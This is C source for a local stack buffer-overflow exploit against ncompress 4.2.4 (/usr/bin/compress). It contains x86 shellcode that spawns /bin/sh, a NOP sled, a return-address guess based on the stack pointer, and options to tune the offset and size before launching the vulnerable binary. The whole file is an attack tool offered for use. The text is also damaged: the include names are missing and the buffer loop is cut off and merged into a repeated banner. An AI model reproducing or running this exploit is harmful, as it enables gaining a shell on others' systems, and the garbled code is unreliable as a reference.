#include #include #include #define VULN "/usr/bin/compress" #define NOP 0x90909090 #define NOPLEN 500 /* This shellcode was taken from some exploit I dont know who wrote it */ const unsigned char linux_x86_exec_hellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__(" mov %esp, %eax"); } void usage(char *prog) { printf("<+> (N)compress 4.2.4 Exploit\n"); printf("<+> By: Lunar Fault [ElectronicSouls]\n"); printf("<+> Information System Advancement in Penetration (ISAP) Laboratories \n"); printf(" usage: %s [options]\n", prog); printf("\t\t-h help\n"); printf("\t\t-o Example: 100\n"); printf("\t\t-r Example: 0xbfffc680\n"); printf("\t\t-s Example: 1056\n"); exit(1); } int main(int argv, char *argc[]) { int i, c, ret, offset; long len; char *buffer, tmpbuf[10]; offset = 0; len = 1056; ret = get_sp(); ret = ret - 100; /* Subtracting 100 from sp to bring the return somewhere in the NOP */ if (argv > 1) { while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) { switch(c) { case 'r': ret = strtoll(optarg, NULL, 0); break; case 's': len = atoi(optarg); break; case 'o': offset = atoi(optarg); break; case 'h': usage(argc[0]); } } } buffer = (char *) malloc(len); ret = ret + offset; for (i=0;i (N)compress 4.2.4 Exploit\n"); printf("<+> By: Lunar Fault [ElectronicSouls]\n"); printf("<+> Information System Advancement in Penetration (ISAP) Laboratories \n"); printf("<*> Offset = %d\n", offset); printf("<*> Return = 0x%.8x\n", ret); printf("<*> Size = %d\n\n", len); execl(VULN, VULN, buffer, 0); return 0; }